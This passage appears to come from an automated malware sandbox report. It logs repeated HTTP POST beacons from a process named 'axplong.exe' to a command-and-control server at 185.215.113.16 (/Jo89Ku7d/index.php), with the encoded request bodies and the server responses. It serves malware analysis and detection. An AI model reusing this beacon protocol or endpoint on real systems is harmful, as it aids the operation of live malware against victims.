                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    46 | 192.168.2.6 | 56673 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:51.849008083 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:52.558371067 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:52.559288025 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:52.790786028 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    47 | 192.168.2.6 | 56675 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:52.901201963 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:53.605561018 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:53.922036886 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:54.149058104 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    48 | 192.168.2.6 | 56676 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:54.260812044 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:54.983449936 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:54.984317064 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:55.215068102 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    49 | 192.168.2.6 | 56677 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:55.324876070 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:56.033041954 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:56.033844948 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:56.729276896 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    50 | 192.168.2.6 | 56678 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:56.844624043 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:57.552449942 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:57.553263903 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:57.780615091 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    51 | 192.168.2.6 | 56679 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:57.902918100 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:58.611336946 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:58.612085104 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:58.838637114 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    52 | 192.168.2.6 | 56680 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:59.126724005 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:59.853976965 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:59.854847908 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:08:00.089365959 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    53 | 192.168.2.6 | 56682 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:08:00.199563026 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:08:00.897063971 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:08:00.900763035 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:08:01.124598026 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    54 | 192.168.2.6 | 56683 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:08:01.245424032 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:08:01.952981949 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:08:01.956552982 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:08:02.186938047 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    55 | 192.168.2.6 | 56684 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:08:02.307837009 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:08:03.035101891 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:08:03.056969881 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:08:03.283761978 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    56 | 192.168.2.6 | 56685 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:08:03.419090986 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:08:04.127178907 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    57 | 192.168.2.6 | 56686 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:08:04.136584997 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:08:05.043207884 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    58 | 192.168.2.6 | 56687 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:08:05.156019926 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:08:05.853718042 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
